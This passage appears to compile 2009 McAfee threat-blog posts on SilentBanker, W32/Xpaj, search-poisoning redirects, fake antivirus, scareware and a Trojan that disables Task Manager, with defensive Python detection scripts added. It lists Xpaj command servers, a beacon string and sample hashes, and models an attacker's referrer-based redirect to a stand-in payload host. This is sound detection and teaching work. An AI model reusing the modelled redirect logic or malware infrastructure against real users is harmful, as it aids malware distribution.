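    img[0x20:0x26] = b"\x68" + struct.pack("<I", 0x54) + b"\xc3"      # push 0x54 ; ret
    return bytes(img)


MEM = _build_hooked_image()


def classify_patch(code: bytes, rva: int):
    """Decode the most common detour forms and return (kind, target_rva)."""
    if code[0] == 0xE9:                                  # jmp rel32, target relative to next insn
        return "jmp", rva + 5 + struct.unpack_from("<i", code, 1)[0]
    if code[0] == 0x68 and code[5] == 0xC3:              # push imm32 ; ret
        return "push_ret", struct.unpack_from("<I", code, 1)[0]
    return "unknown", None


def find_detours(exports, disk: bytes, mem: bytes, n: int = 8):
    """Exports whose first n in-memory bytes differ from the on-disk image."""
    found = []
    for name, rva in exports.items():
        if mem[rva:rva + n] != disk[rva:rva + n]:
            kind, target = classify_patch(mem[rva:rva + n], rva)
            found.append((name, kind, target))
    return found


def restore_hooked_bytes(exports, disk: bytes, mem: bytes, n: int = 8) -> bytes:
    """The 'remove_API_hooks' step: copy the on-disk prologue back over each detour."""
    out = bytearray(mem)
    for name, _, _ in find_detours(exports, disk, mem, n):
        rva = exports[name]
        out[rva:rva + n] = disk[rva:rva + n]
    return bytes(out)


if __name__ == "__main__":
    for name, kind, target in find_detours(EXPORTS, DISK, MEM):
        print(f"{name}: {kind} -> {target:#x}")
```

    Hot-patchable prologues (`mov edi, edi` followed by the frame setup) are five bytes long precisely so that a `jmp rel32` fits; that is why a compare of the first eight bytes catches both detour forms used here. Products that rely on those same bytes for protection are blind once SilentBanker has run its restore, which is the point the pseudocode above makes.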

    Be sure to run McAfee VirusScan and Artemis, and McAfee Gateway Anti-Malware within your corporate network to protect your systems from password thieves.

    W32/Xpaj: Know Your Polymorphic Enemy

    Nowadays, most anti-virus products can deal with viruses relatively easily using a variety of technologies. Decent emulator-based scan engines can handle the majority of polymorphic and metamorphic viruses, including those that use entry-point obscuring (EPO). But when it comes to viruses with delayed loading and random code-block insertion, such as W32/Zmist (a.k.a. Mistfall), code emulators are not the best approach. We recently came across a new W32/Xpaj variant that is actively spreading. It uses evasion techniques that are well known in theory but seldom found in live samples.

    The new W32/Xpaj uses a random code block integration technique to infect files. It does not change the original entry point of the file. Instead, W32/Xpaj builds several code blocks responsible for different functionalities and moves them into random locations throughout the code section of the infected file. It is similar to what W32/Zmist used to employ, but W32/Xpaj uses code replacement instead of code insertion.

    Its polymorphic decryptor is represented by a number of code blocks linked by unconditional jumps. Once executed, the polymorphic decryptor gains control and performs different tasks:

    1. Saving the original state of the infected application and preserving all the registers used by the virus
    2. Changing the protection flags of the memory where the virus body is located
    3. Decrypting the virus body
    4. Jumping to the decrypted virus body

    Each task may be located in a separate block of code or combined in one big block.

    Once decryption is done, control passes to the main virus body, usually located in a different section. Its authors decided to use register-based jumps instead of relative jumps. The former, together with a heavily encrypted virus body and stolen functions, make this new variant more complicated to repair:

    To make sure the virus is executed at least once, W32/Xpaj finds a number of call instructions in the host and redirects them to the beginning of one of the virus code blocks created during infection.

    The random location of the polymorphic code blocks means that for some samples, code emulators may never reach the viral instructions. Such samples may present a hidden surprise to some anti-virus vendors, which might not be able to detect all instances of W32/Xpaj, missing a certain percentage of infected files. However, in other cases, the virus may never gain control at all, such as in the following samples found in the wild:

    • 4843998e3564ac1a1e137149bc3ce28e
    • 8e4260d0a29c0133bad3bc0e39057456
    • db4fff8a4a21e9c824cde3ebd151fbf2

    While decrypting the virus body, W32/Xpaj may generate millions of iterations. Code emulators without decent support of dynamic code translation may fail to run it through correctly. It integrates itself into infected files and becomes a part of the host program control flow. Original functions replaced with the virus decryptor are saved, encoded, and are located in the same section with the virus body.

    This variant of W32/Xpaj increases the virtual size of the section containing the virus body by 150KB. It is heavily obfuscated and contains functionality to receive further instructions from remote servers:

    • tooratios.com (82.98.235.66)
    • abdulahuy.com (82.98.235.66)

    The server is currently active and located in Belgium, and sends instructions through the following file:

    • hxxp://abdulahuy.com/{blocked}/stamm.dat

    Interestingly, the malware authors decided to monitor their own virus’s activity and built reporting into this beast. Every file infected with W32/Xpaj reports to the above-mentioned server and sends information about the system (OS version, service pack, IP, etc.) on which the infected file is running:

    os=00000005.00000001.02000B28&cm=18B51294&adn=A120BB0F&knv=00000012&hdd=002F606E&cid=0000000C&vvr=00000001

    The majority of AV vendors do not currently detect this W32/Xpaj variant (as seen in these VirusTotal results):
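    A file infector that leaves the entry point alone but enlarges a section by 150KB is easy to miss with signatures and easy to catch with a baseline. The added example below (my own code, not McAfee’s detection logic) hand-parses the PE section table of a known-good copy and a suspect copy of the same binary and reports sections that appeared, grew beyond a threshold, or changed their characteristics flags. The two images are constructed headers with no real code; the growth figure mirrors the 150KB observation above, while the 64KB threshold and the choice of which section grows are assumptions.

```python
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def parse_sections(data: bytes):
    """Hand-parse the PE section table (headers only; no third-party library)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + opt_size                    # COFF header is 20 bytes
    out = []
    for i in range(nsections):
        off = table + i * 40                        # IMAGE_SECTION_HEADER is 40 bytes
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", data, off)
        chars = struct.unpack_from("<I", data, off + 36)[0]
        out.append({"name": name.rstrip(b"\0").decode(errors="replace"),
                    "vsize": vsize, "vaddr": vaddr, "rawsize": rawsize,
                    "rawptr": rawptr, "chars": chars})
    return out


def diff_sections(clean: bytes, suspect: bytes):
    """Pair sections by name and report size growth and flag changes."""
    base = {s["name"]: s for s in parse_sections(clean)}
    report = []
    for s in parse_sections(suspect):
        b = base.get(s["name"])
        if b is None:
            report.append({"name": s["name"], "new": True, "vsize_delta": s["vsize"],
                           "raw_delta": s["rawsize"], "flags_changed": True})
            continue
        report.append({"name": s["name"], "new": False,
                       "vsize_delta": s["vsize"] - b["vsize"],
                       "raw_delta": s["rawsize"] - b["rawsize"],
                       "flags_changed": s["chars"] != b["chars"]})
    return report


def suspicious_sections(clean: bytes, suspect: bytes, growth: int = 64 * 1024):
    """Names of sections that appeared, grew by >= growth bytes, or changed flags."""
    return [d["name"] for d in diff_sections(clean, suspect)
            if d["new"] or d["vsize_delta"] >= growth or d["flags_changed"]]


def build_pe(sections):
    """Constructed minimal PE header for testing; sections = [(name, vsize, rawsize, chars)]."""
    e_lfanew = 0x80
    dos = (b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    opt_size = 224
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    opt = struct.pack("<H", 0x10B).ljust(opt_size, b"\0")
    table, vaddr, rawptr = b"", 0x1000, 0x400
    for name, vsize, rawsize, chars in sections:
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                             vsize, vaddr, rawsize, rawptr, 0, 0, 0, 0, chars)
        vaddr += (vsize + 0xFFF) & ~0xFFF
        rawptr += rawsize
    return dos + b"PE\0\0" + coff + opt + table


CODE = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
DATA = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE

# Known-good baseline and a copy whose last section grew by 150KB (assumed pattern).
CLEAN = build_pe([(".text", 0x5000, 0x5000, CODE), (".data", 0x1000, 0x1000, DATA)])
INFECTED = build_pe([(".text", 0x5000, 0x5000, CODE),
                     (".data", 0x1000 + 150 * 1024, 0x1000 + 150 * 1024, DATA)])

if __name__ == "__main__":
    print(suspicious_sections(CLEAN, INFECTED))
```

    Run against a software inventory this is a cheap integrity check that does not depend on emulating the decryptor at all; its limits are that it needs a trusted baseline copy, and that an infector which hides inside existing slack rather than growing the section will not trip the size test (the flag-change test still helps there).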

    Search-Engine Manipulation Evolves as Trust Abuse Grows

    I revisited the topic of search-engine manipulation (a.k.a. blackhat SEO) in two recent posts. Something caught my eye while investigating cases of search-result poisoning–a shift away from tactics used by the attackers earlier in the year.

    Previously, attackers mostly registered free websites to pull off their attacks. They would create a bunch of new sites, cross-link them, and use other tricks to get their pages indexed and ranked high on relevant search result pages (again, largely targeting the most popular search terms of the day, such as those found on Google Trends.) I blogged earlier in the year about how the user forum on democrats.org was leveraged to link a high-ranking site with newly created malicious sites.

    It seems now that attackers are combining elements of different attacks to achieve blackhat SEO.

    There are currently many examples of high-ranking poisoned results that lead to compromised legitimate sites. This is a bit different than in the past, as now security vulnerabilities are being exploited simply for the sake of search-engine manipulation. 

    Historically we’ve seen attackers upload malicious content to compromised sites, either directly, by injecting exploit code, or indirectly, by injecting an iframe or script that pulls exploit code from a remote site. Such situations can lead to site users notifying the compromised site’s administrator that they were attacked while visiting it. Redirecting victims to a completely different site helps conceal the poisoned site.

    The attackers go a step further with a well-worn trick: conditional redirection. It’s not enough for people to go to a compromised page; they must arrive there from a search-result page. In other words, users (or site admins) who navigate directly to http://compromised-site.com/attacker_created_page will not be redirected to the payload site unless the Referer shows they came from a Google search-result page.
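    Because the redirect keys on the Referer, the check for a site owner is to request the page twice, once directly and once with a search-engine Referer, and compare. The added example below (not code from the original post or from any attacker kit) models the attacker-side logic as a small in-process handler, provides a real `urllib` fetch that does not follow redirects so the 302 target stays visible, and a probe that reports whether the responses diverge. The payload URL and the page content are constructed; the referrer check is generalised to any of the three major engines rather than Google alone, which is what the text describes.

```python
import urllib.error
import urllib.request
from urllib.parse import urlparse, parse_qs

PAYLOAD = "http://payload.example.net/scan.php"      # hypothetical rogue-AV landing page
SEARCH_HOSTS = ("google.", "bing.", "yahoo.")


def is_search_referrer(referer: str) -> bool:
    """True when the Referer looks like a search-result page of a major engine."""
    if not referer:
        return False
    u = urlparse(referer)
    host = u.hostname or ""
    q = parse_qs(u.query)
    return any(part in host for part in SEARCH_HOSTS) and ("q" in q or "p" in q)


def cloaked_page(headers: dict):
    """Model of the attacker-created page described above (constructed, not captured):
    search visitors get a 302 to the payload, everyone else a bland page."""
    if is_search_referrer(headers.get("Referer", "")):
        return 302, {"Location": PAYLOAD}, b""
    return 200, {"Content-Type": "text/html"}, b"<html><body>Bengals blackout tickets</body></html>"


def http_fetch(url: str, headers: dict):
    """Real fetch returning (status, headers, body) without following redirects."""
    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, req, fp, code, msg, hdrs, newurl):
            return None
    opener = urllib.request.build_opener(NoRedirect)
    req = urllib.request.Request(url, headers=headers)
    try:
        with opener.open(req, timeout=10) as r:
            return r.status, dict(r.headers), r.read()
    except urllib.error.HTTPError as e:          # 3xx surfaces here once redirects are disabled
        return e.code, dict(e.headers), e.read()


def probe_cloaking(fetch, url: str):
    """Fetch as a direct visitor and as a Google-search visitor; cloaked if they differ."""
    ua = {"User-Agent": "Mozilla/5.0"}
    direct = fetch(url, dict(ua))
    via_search = fetch(url, {**ua, "Referer": "http://www.google.com/search?q=bengals+blackout"})
    return {"cloaked": direct[0] != via_search[0] or direct[2] != via_search[2],
            "direct_status": direct[0], "search_status": via_search[0],
            "redirect_target": via_search[1].get("Location")}


def fake_fetch(url: str, headers: dict):
    """Offline stand-in for http_fetch that serves the modelled cloaked page."""
    return cloaked_page(headers)


if __name__ == "__main__":
    print(probe_cloaking(fake_fetch, "http://compromised-site.example/attacker_created_page"))
```

    To test a live page, pass `http_fetch` instead of `fake_fetch`. Keep the probe's own redirect handling disabled as shown: a client that silently follows the 302 would fetch the rogue-AV page and hide the very indicator you are looking for.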

    Some of the compromised sites run older, vulnerable phpBB and WordPress installations. Other sites are serving attacker-created HTML pages, perhaps as a result of compromised admin or user credentials or misconfigured web servers.

    These events further blur the line between “trusted” sites and malicious content. This trend is likely to continue for years to come.

    Private Jet-Set Network Hacked

    We hear a lot about cybercrime events concerning Facebook or Myspace, but do you know ASmallWorld? It is a private international community for the jet-set crowd and culturally influential people.


    Yesterday the French police force (OCLCTIC), accompanied by FBI agents, arrested two French residents. They were suspected of hacking this social-network platform dedicated to the worldwide upper crust. They allegedly attempted to extort US$1 million from the webmasters to not divulge stolen data.

    Two years ago, a post titled “Asmallworld.net: we have hacked the smartest worldwide website” made some noise in France.

    Whether you mingle with the jet set or in other circles, be careful when you share information on your favorite social network platform!

    FakeAlert Malware Disguises as McAfee Product

    “Illusion is needed to disguise the emptiness within.” – Arthur Erickson

    I thought this was the perfect quote for fake anti-malware software, or FakeAlert threats. FakeAlert malware imposes an illusion of protection on its users, but behind it there is nothing at all. It has become a common sight for malware to spoof program file resources, such as icons or company information, from legitimate software. Among the most spoofed resources are Microsoft file properties: the company information or icons of programs such as calc.exe and notepad.exe, even Windows folder icons. Why would they do this?

    It is easy for less computer-savvy users to trust that a program is legitimate based on visible features of a file, such as its icon or file properties. It’s a nice facade for malware to slip through. We recently came across a FakeAlert threat that attempts to disguise itself as a McAfee product using a spoofed McAfee icon. Perhaps FakeAlert authors are taking notice of McAfee as one of the world’s most trusted security companies.

    Call it social engineering or just another sneaky attempt to get by. The bottom line is that looks are deceptive, so don’t trust everything you see, whether it’s a resource icon or the company information in the file properties. This FakeAlert malware, which brands itself as “AntiVirus Pro 2010,” is nothing but a spin-off of FakeAlert-XPSecCenter (a.k.a. WinreAnimator, among its many re-branded names).
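    The company information shown in a file’s properties comes from the VS_VERSIONINFO resource, which anyone can write; the one thing a spoofer cannot forge is a valid Authenticode signature from the vendor it claims. The added example below (my own code, not McAfee’s) pulls the string values out of a version resource by scanning for the UTF-16 key names, the way a strings-style triage does, and then reports the mismatches that give a fake away: a trusted vendor named as CompanyName without a matching signer, and an OriginalFilename that differs from the name on disk. The file fragment is constructed; the signer subject is assumed to come from signtool or Get-AuthenticodeSignature, and the check that the resource is DWORD-aligned in the file is an assumption that holds for normal .rsrc data.

```python
import struct

VERSION_KEYS = ("CompanyName", "ProductName", "FileDescription", "OriginalFilename", "LegalCopyright")
TRUSTED_VENDORS = ("McAfee", "Microsoft")          # names worth impersonating (assumed list)


def _read_wstr(data: bytes, pos: int) -> str:
    """Read a NUL-terminated UTF-16LE string starting at pos."""
    end = pos
    while end + 1 < len(data) and data[end:end + 2] != b"\0\0":
        end += 2
    return data[pos:end].decode("utf-16-le", errors="replace")


def version_strings(data: bytes) -> dict:
    """StringFileInfo values found by scanning for each key's UTF-16 name.
    In a String record the Value starts on the next DWORD boundary after szKey."""
    found = {}
    for key in VERSION_KEYS:
        needle = key.encode("utf-16-le") + b"\0\0"
        pos = data.find(needle)
        if pos < 0:
            continue
        value_pos = (pos + len(needle) + 3) & ~3
        found[key] = _read_wstr(data, value_pos)
    return found


def impersonation_findings(actual_filename: str, strings: dict, signer) -> list:
    """Mismatches between what the file claims and what can be verified.
    signer: Authenticode signer subject obtained out of band, or None if unsigned/invalid."""
    findings = []
    company = strings.get("CompanyName", "")
    for vendor in TRUSTED_VENDORS:
        claims = vendor.lower() in company.lower()
        signed_by = signer is not None and vendor.lower() in signer.lower()
        if claims and not signed_by:
            findings.append(f"claims CompanyName '{company}' but is not signed by {vendor}")
    orig = strings.get("OriginalFilename", "")
    if orig and orig.lower() != actual_filename.lower():
        findings.append(f"OriginalFilename '{orig}' differs from on-disk name '{actual_filename}'")
    return findings


def _vs_string(key: str, value: str) -> bytes:
    """Encode one VS_VERSIONINFO 'String' record: wLength, wValueLength (WCHARs),
    wType=1 (text), szKey, DWORD padding, Value, DWORD padding."""
    k = key.encode("utf-16-le") + b"\0\0"
    v = value.encode("utf-16-le") + b"\0\0"
    body = struct.pack("<HHH", 0, len(v) // 2, 1) + k + b"\0" * ((-(6 + len(k))) % 4) + v
    body += b"\0" * ((-len(body)) % 4)
    return struct.pack("<H", len(body)) + body[2:]


# Constructed fragment of a rogue AV binary: MZ header, filler, then the
# String records at a DWORD-aligned offset (no real code, no real resource tree).
FAKE_AV = (b"MZ" + b"\0" * 62
           + _vs_string("CompanyName", "McAfee, Inc.")
           + _vs_string("ProductName", "AntiVirus Pro 2010")
           + _vs_string("OriginalFilename", "calc.exe"))

if __name__ == "__main__":
    s = version_strings(FAKE_AV)
    print(s)
    print(impersonation_findings("AntiVirusPro2010.exe", s, None))
```

    The OriginalFilename check catches the calc.exe and notepad.exe borrowing the post mentions even when the company string is left blank; the signer check is the one that actually decides trust, so feed it the verified subject and not a string taken from the file itself.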

    The following are some updated snapshots of FakeAlert-XPSecCenter:

    Images 1 to 3: FakeAlert-XPSecCenter screenshots

    Beware of this FakeAlert variant; it is in no way related to McAfee products. Safe surfing!

    Searches for Patrick Swayze Info Could Lead to Malware

    Another celebrity death.  Another recycled scareware tactic attempting to lure users to download malware by telling them that their PC is infected with a virus.  We saw it after the deaths of Michael Jackson, Farrah Fawcett, and Natasha Richardson earlier this year.  Now the attention of cyber criminals has turned to Monday’s death of Patrick Swayze as the soup du jour for malware distribution.

    Queries for information on the death of the popular actor may lead to news stories that look legitimate when returned in search results, but when followed may lead users to a site that looks like this:

    Swayze Spam

    This tactic of presenting a window that looks very much like a legitimate Windows pop-up has been used many times before in various forms. The Windows Explorer-like screen presented to the user also uses geolocation, in an attempt to show the user the country and city they are browsing from and make them believe that their data is actively under attack. Pop-ups with phrases such as “Scan procedures finished. 34 Potential aggressive items was found!” and “Your computer remains infected by threats! They might lead to data loss and file structure damage, and needed to be heal as soon as possible. Return to Total Security and download it secure to your PC” try to convince users that the only way to protect themselves is to download the bogus security software.

    Clearly, scareware is something cyber criminals have latched onto as a popular method of malware distribution, as it continues to be a recurring and evolving theme. Conficker/Downadup largely popularized scareware with its success (although it wasn’t the first to use it), and now others are riding on that popularity and repurposing it for their own scams.

    Google Trends Suffering Abuse Today

    Wouldn’t you know it. Just the other day I blogged about rogue anti-virus software makers selectively targeting certain hot search terms. Since then the majority of top terms lead to poisoned links within the top 10-20 search results.

    Recently there have been some news stories about attackers targeting specific topics or terms, but from what I’m seeing they are pretty indiscriminate. It doesn’t matter what the topic is. If people are searching for it, then the bad guys want to poison the results. The speed at which these links appear suggests the operation is largely automated. 

    Here’s one example for bengals blackout. One way to spot a bad link is that the title is exactly the same as the search term, it’s in all-capital letters, and the URL contains the search terms as well, while the summary contains the kind of text you’d expect from a news story. This is not a foolproof way to call something bad, but it is a strong indication that something might be fishy.
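    The three signals above are mechanical enough to score automatically. The added example below (my own code, not part of the original post) applies them to a list of search results for a query and returns the ones that trip at least two signals, which keeps a legitimate news story whose URL happens to contain the terms out of the list. The three results are constructed; the threshold is an assumption.

```python
import re
from urllib.parse import urlparse


def _tokens(s: str):
    return [t for t in re.split(r"[^a-z0-9]+", s.lower()) if t]


def score_result(query: str, title: str, url: str) -> dict:
    """Apply the three signals from the text to one result; one point each."""
    q = _tokens(query)
    reasons = []
    if _tokens(title) == q:
        reasons.append("title is exactly the search term")
    letters = [ch for ch in title if ch.isalpha()]
    if letters and all(ch.isupper() for ch in letters):
        reasons.append("title is all capitals")
    u = urlparse(url)
    path_tokens = _tokens(u.path + " " + u.query)
    if q and all(t in path_tokens for t in q):
        reasons.append("URL contains every search term")
    return {"score": len(reasons), "reasons": reasons}


def rank_suspicious(query: str, results, threshold: int = 2):
    """results: list of (title, url). Those scoring >= threshold, highest first."""
    scored = [(score_result(query, t, u)["score"], t, u) for t, u in results]
    return [(t, u) for s, t, u in sorted(scored, key=lambda x: -x[0]) if s >= threshold]


# Constructed results for the query "bengals blackout".
RESULTS = [
    ("BENGALS BLACKOUT", "http://cheap-host.example/bengals-blackout/index.php"),
    ("Bengals game blacked out locally as ticket sales lag",
     "http://news.example.com/sports/2009/09/bengals-tv-blackout.html"),
    ("BENGALS BLACKOUT", "http://compromised.example.org/wp-content/bengals_blackout.html"),
]

if __name__ == "__main__":
    for title, url in rank_suspicious("bengals blackout", RESULTS):
        print(title, url, score_result("bengals blackout", title, url)["reasons"])
```

    The threshold matters: a single signal, such as the search terms appearing in a URL path, is exactly what a real news article produces, so on its own it should never trigger.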

    Search safe.

    New Version of McAfee FileInsight

    Today we released version 2.1 of McAfee FileInsight. You can download your free copy from the Avert Tools site. FileInsight is a handy integrated environment for web site and file analysis. It offers hex editing, syntax highlighting, several built-in decoders, a calculator, a disassembler, JavaScript scripting support, a Python-based plugin system and more.

    Let’s go through some stages of an exemplary malware attack to highlight some of its analysis features – but don’t try this stunt at home, unless you know what you’re doing; a safe, isolated lab environment is absolutely mandatory for any such research work.

    The above screen shows the initial malicious web site, which tries to determine your browser and redirect to one or more exploits of its choice. One of them is an exploit for the Microsoft DirectShow Video ActiveX Control vulnerability (MS09-032), stopped as “Exploit-MSDirectShow.b” by McAfee VirusScan and as “BehavesLike.Exploit.CodeExec.EBEO” by McAfee Gateway Anti-Malware.

    Getting to the actual shellcode takes some JavaScript unpacking steps. The JavaScript code is spread over several script files and custom encoded. In the above screen, we take that malicious code into FileInsight’s Scripting window and let it deobfuscate there.

    Once we’re down to the shellcode level, we can directly look at the shellcode in the built-in disassembler. The Disassembler window also features recursive traversal to come up with branch labels automatically.

    It uses a CALL/POP sequence to determine the actual memory location of the obfuscated payload, sets up a loop to decode the payload, and then executes it. The decoded payload downloads a XOR-obfuscated executable that turns out to be a UPX-packed backdoor (stopped by Artemis and by McAfee Gateway Anti-Malware as “LooksLike.Win32.Suspicious.C”).
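    The XOR-obfuscated download is the part of this chain you can undo without a debugger: every Windows executable carries the DOS stub text “This program cannot be run in DOS mode”, so a repeating-key XOR leaks its key to a known-plaintext attack. The added example below (my own script, not a FileInsight plugin or McAfee code) slides that string over the ciphertext, derives the key it implies for each candidate key length, discards inconsistent candidates, and accepts the first key that produces a plausible MZ/PE header; it then checks for the UPX markers the post mentions. The “downloaded” executable is a constructed header with no real code, and the three-byte key is an assumption.

```python
import struct

DOS_STUB_TEXT = b"This program cannot be run in DOS mode"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_pe(data: bytes) -> bool:
    """MZ signature plus a PE\\0\\0 signature at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def recover_xor_key(cipher: bytes, max_key_len: int = 32):
    """Known-plaintext attack on a repeating-key XOR. Returns (key, plaintext)
    or (None, None). Keys longer than the known text are not fully determined."""
    max_key_len = min(max_key_len, len(DOS_STUB_TEXT))
    for pos in range(len(cipher) - len(DOS_STUB_TEXT) + 1):
        for klen in range(1, max_key_len + 1):
            key = [None] * klen
            consistent = True
            for i, p in enumerate(DOS_STUB_TEXT):
                k = cipher[pos + i] ^ p
                slot = (pos + i) % klen            # key index is relative to file offset 0
                if key[slot] is None:
                    key[slot] = k
                elif key[slot] != k:
                    consistent = False
                    break
            if not consistent or None in key:
                continue
            plain = xor_bytes(cipher, bytes(key))
            if looks_like_pe(plain):
                return bytes(key), plain
    return None, None


def is_upx_packed(data: bytes) -> bool:
    """UPX leaves its 'UPX!' pack-header magic and UPX0/UPX1 section names unless scrubbed."""
    return b"UPX!" in data or b"UPX0" in data or b"UPX1" in data


def _build_fake_pe() -> bytes:
    """Constructed stand-in for the downloaded file: DOS header, stub text,
    PE signature and a UPX marker. Not a runnable binary."""
    e_lfanew = 0x80
    hdr = b"MZ\x90\x00" + b"\0" * 0x38 + struct.pack("<I", e_lfanew)
    stub = (b"\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21"
            + DOS_STUB_TEXT + b".\r\n$")
    head = (hdr + stub).ljust(e_lfanew, b"\0")
    return (head + b"PE\0\0" + b"\x4c\x01\x03\x00" + b"\0" * 32
            + b"UPX!" + b"\0" * 64 + b"UPX0\0\0\0\0" + b"\0" * 32)


FAKE_PE = _build_fake_pe()
KEY = bytes.fromhex("5a3c9e")                 # assumed key used by the dropper
OBFUSCATED = xor_bytes(FAKE_PE, KEY)

if __name__ == "__main__":
    key, plain = recover_xor_key(OBFUSCATED)
    print("key:", key.hex(), "upx:", is_upx_packed(plain))
```

    Because the key index is taken relative to offset zero rather than to where the stub text happens to sit, the recovered key decrypts the whole file in one pass. The PE check on the candidate plaintext is what keeps the attack honest: a key derived from a wrong alignment will not produce a valid header.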

    Advanced users may also want to look into FileInsight’s Python-based plugin system, but be warned: writing plugins in a language as simple as Python has a certain addiction potential! ;-)

    FileInsight is available here.

    Chinese Pharmacy Spam and Our Monthly Spam Report

    The recent onslaught of “Chinese pharmacy” spam and the DDoS attacks that took down Twitter, Facebook and others have caused a frenzy of speculation about the Chinese government’s involvement in spam generation and acts of cyberterrorism. McAfee’s September 2009 Spam Report debunks these rumors and gets to the root cause.

    The report reveals the truth behind the “Chinese pharmacy” spam:

    • “Chinese pharmacy” spam appears to be the result of a need for regional pharmaceutical companies to offload excess drugs internationally, as selling excess drugs inside the country violates Chinese law. We just don’t believe this month’s onslaught is a sinister government plot.
    • Spam originating from China can often make up between 60 percent and 65 percent of today’s global email volume
    • “Chinese newsletter” spam emails were the leading type of pharmaceutical spam, with a total of 52,428 emails that contained 1,235 unique URL domains in a single day
    • If excess drugs in China cannot be sold into the legal market due to Chinese law, then they will continue to be sold on the black market

    Furthermore, the report uncovers findings that have surfaced since the August 6 DDoS attacks:

    • The August 6 spam campaign, launched in conjunction with the DDoS attacks, was not solely responsible for the downfall of the social networking sites and, in fact, was likely a mere afterthought of the attacker
    • The August 6 DDoS and spam attack was intended to target a pro-Georgian blogger, and was likely part of an intimidation campaign in retaliation for his political blogs
    • Brazil, Turkey, and India were among the top three domains from which infected machines spread the August 6 spam campaign in conjunction with the DDoS attack

    Check out the full report here.

    FIFA World Cup Scams Start Early

    It is certainly not surprising when scammers use major events such as the upcoming FIFA World Cup 2010 to fuel their scams, but I am surprised at how early they started this time!

    In fact, the scammers are taking advantage of two events: the soccer World Cup in South Africa next summer and the 75th anniversary of the first flight of a major airline. Two days ago a coworker forwarded me this mail:

    Star Alliance Member Airline

    Gooday 

    South African Airways (SAA) is the largest and most important African airline and has received numerous “Best African Airline” awards from different leading magazines and international organizations. The airline was founded 1934 and celebrates its 75th anniversary in 2009. It was one of the first national airlines worldwide.
    South African Airways is offering 200 people a free opportunity and all expenses paid
    trip to watch the Fifa 2010 world cup by their ongoing promotion.
    This enables the winners for an automatic visa and a
    Free trip to watch the first and second matches on 11/06/2010 at Soccer City, Johannesburg and Green Point, Cape Town
    You are lucky to be among the selected people
    Reply with This Details
    Your full  Name
    Your full Address
    Your Email
    Your cell No
    Thanks
    Mr Kelvin Brodus
    Cordinator
    —————

    The first part of the text was lifted from a U.K.-based riding holiday website, with the usual “Hey, you just won a really cool prize. Just send me all your personal information” spin added on. This scam is certainly not the most sophisticated we shall see, but to my knowledge it is the first.

    So as you anticipate your team’s lifting the trophy next July, be careful what emails you reply to or what links you click on. For links in email, do as I do: Don’t click any of them.

    Task Manager Still Working? Can You Change Your Windows Password?

    Update of September 3:

    Some detections of this Trojan were on a component of a commercial application. For this reason we’ve updated the detection type to “potentially unwanted program” (PUP). Customers who see files that exhibit the behavior discussed in the Threat Library for QTaskMgr-1 should submit the file to McAfee Avert Labs.

    In anti-virus research, context is everything. We had a sample that was not signed correctly and behaved suspiciously. We have to think of our users’ security, so we detected the file. Without knowing that the sample was part of a nonmalicious application, we had to assume it was dangerous.

    One reason we make this assumption is cases such as files infected with W32/Induc. There, even if the binary’s resources check out, it is still compromised. If it looks bad, smells bad, tastes bad, and you’re not told otherwise, then it probably is bad.

    Original blog, published September 1:

    We have all heard of malware that weakens a computer’s security. Such malware might, for instance, disable your access to the registry, lower Internet Explorer’s security configuration, delete system files, or manipulate the system’s DNS settings. Each of these steps exposes the victim to graver malware infections or system compromise.

    Yesterday we ran into a Trojan that weakens the victim system’s security by making registry changes. The malware disables Task Manager, Windows Update, and toolbars in Internet Explorer. Further, it does not let you lock your machine or change your password. If you pressed Ctrl+Alt+Del after the infection you would see this:

    Because losing Task Manager is the most damaging security attack on our list above, we’ve called this Trojan QTaskMgr-1. Detection and cleaning for QTaskMgr-1 have been included since the 5727 DATs, released September 1.
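    The post does not list the registry values the Trojan sets, but every symptom above (Task Manager, Lock Workstation and Change Password gone, Automatic Updates off) corresponds to a standard Windows policy value. The script below is an added example, ours rather than McAfee’s detection logic: it audits a `reg export` dump for those values so an administrator can confirm the lockdown and know exactly what to revert. The symptom-to-value mapping is our assumption from Windows policy documentation, and the dump it runs on is constructed.

```python
"""Audit a `reg export` dump for the policy values behind the QTaskMgr-1 symptoms.

Added example, not McAfee's detection logic. The post does not name the registry
values the Trojan sets; the mapping below is an assumption drawn from the
standard Windows policy values that disable Task Manager, Lock Workstation,
Change Password and Automatic Updates. Input is .reg text, so this runs offline.
"""
import re

# Assumed symptom-to-policy mapping (standard Windows policy values, not taken from the post).
# Key paths and value names are lower-cased because the registry is case-insensitive.
SUSPECT_VALUES = {
    r"hkey_current_user\software\microsoft\windows\currentversion\policies\system": {
        "disabletaskmgr": "Task Manager disabled",
        "disablelockworkstation": "Lock Workstation disabled",
        "disablechangepassword": "Change Password disabled",
    },
    r"hkey_local_machine\software\policies\microsoft\windows\windowsupdate\au": {
        "noautoupdate": "Automatic Updates disabled",
    },
}

KEY_RE = re.compile(r"^\[(.+)\]$")                                # [HKEY_...\Path]
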